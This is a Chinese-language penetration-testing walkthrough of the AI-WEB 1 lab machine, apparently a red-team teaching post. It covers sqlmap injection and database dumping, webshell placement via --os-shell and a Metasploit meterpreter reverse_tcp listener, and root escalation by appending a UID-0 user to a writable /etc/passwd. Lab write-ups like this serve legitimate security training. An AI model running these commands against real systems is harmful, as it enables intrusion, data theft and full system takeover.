红队专项·AI-WEB 1
字数 1025 2025-08-10 20:57:54

AI-WEB 1 靶机渗透测试教学文档

靶机概述

  • 难度等级:中级
  • 目标:获取root权限并找到flag.txt
  • 环境:自行搭建的渗透测试环境
  • 重要提示:本文技术仅用于合法授权测试,非法使用后果自负

信息收集阶段

网络扫描

  1. 使用桥接模式连接靶机网络
  2. 使用arp-scan确定目标IP地址
  3. 使用nmap扫描开放端口和服务

Web服务探测

  • 发现开放80端口HTTP服务
  • 探测到robots.txt文件,包含路径信息
  • 发现可访问路径/se3,具有数据查询功能

渗透攻克阶段

SQL注入攻击

  1. 使用sqlmap工具进行自动化注入测试
  2. 分步操作:
    • 爆数据库名:--current-db
    • 爆表名:--tables -D "xxxx"
    • 爆字段名:--columns -T xxxx -D xxxxx
    • 导出数据:-D xxxxx --dump-all --batch

获取Webshell的三种方法

方法一:利用os-shell写webshell

  1. 前提条件:
    • 具有FILE权限
    • 知道网站绝对路径
    • GPC为off(PHP主动转义功能关闭)
  2. 执行命令:sqlmap -r post.txt --os-shell
  3. 通过上传页面反弹shell

方法二:file-dest写入木马

  1. 使用msfvenom生成PHP webshell
  2. 设置Metasploit监听:
    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost 172.46.229.39
    set lport 1234
    
  3. 通过sqlmap写入webshell

方法三:通过os-shell上传页面直接上传webshell

权限提升阶段

查找可写文件

  1. 查找可写目录:find / -writable -type d 2>/dev/null
  2. 查找可写文件:find / -writable -type f 2>/dev/null

利用/etc/passwd可写漏洞

  1. 发现www-data用户对/etc/passwd有写权限
  2. 生成加密密码:
    perl -le 'print crypt("1q2w3e4r","salt")'
    
  3. 添加特权用户:
    echo "wIngy:saPxWonD/gnR6:0:0:hacker:/root:/bin/bash" >> /etc/passwd
    
  4. 切换用户:su wIngy

技术总结

  1. 完整渗透流程:信息收集→漏洞利用→获取初始访问→权限提升
  2. 关键工具使用:arp-scan、nmap、sqlmap、msfvenom
  3. 重要技术点:SQL注入、Webshell上传、特权文件篡改

注意事项

  1. 实战中不建议使用--dump-all,应针对性获取数据
  2. 多种获取Webshell的方法可根据实际情况选择
  3. 权限提升前应先全面收集系统信息

相关标签

#渗透测试 #工具使用 #红队 #SQL注入 #权限提升

AI-WEB 1 靶机渗透测试教学文档 靶机概述 难度等级:中级 目标:获取root权限并找到flag.txt 环境:自行搭建的渗透测试环境 重要提示:本文技术仅用于合法授权测试,非法使用后果自负 信息收集阶段 网络扫描 使用桥接模式连接靶机网络 使用 arp-scan 确定目标IP地址 使用 nmap 扫描开放端口和服务 Web服务探测 发现开放80端口HTTP服务 探测到 robots.txt 文件,包含路径信息 发现可访问路径 /se3 ,具有数据查询功能 渗透攻克阶段 SQL注入攻击 使用 sqlmap 工具进行自动化注入测试 分步操作: 爆数据库名: --current-db 爆表名: --tables -D "xxxx" 爆字段名: --columns -T xxxx -D xxxxx 导出数据: -D xxxxx --dump-all --batch 获取Webshell的三种方法 方法一:利用os-shell写webshell 前提条件: 具有FILE权限 知道网站绝对路径 GPC为off(PHP主动转义功能关闭) 执行命令: sqlmap -r post.txt --os-shell 通过上传页面反弹shell 方法二:file-dest写入木马 使用msfvenom生成PHP webshell 设置Metasploit监听: 通过sqlmap写入webshell 方法三:通过os-shell上传页面直接上传webshell 权限提升阶段 查找可写文件 查找可写目录: find / -writable -type d 2>/dev/null 查找可写文件: find / -writable -type f 2>/dev/null 利用/etc/passwd可写漏洞 发现www-data用户对/etc/passwd有写权限 生成加密密码: 添加特权用户: 切换用户: su wIngy 技术总结 完整渗透流程:信息收集→漏洞利用→获取初始访问→权限提升 关键工具使用:arp-scan、nmap、sqlmap、msfvenom 重要技术点:SQL注入、Webshell上传、特权文件篡改 注意事项 实战中不建议使用 --dump-all ,应针对性获取数据 多种获取Webshell的方法可根据实际情况选择 权限提升前应先全面收集系统信息 相关标签 #渗透测试 #工具使用 #红队 #SQL注入 #权限提升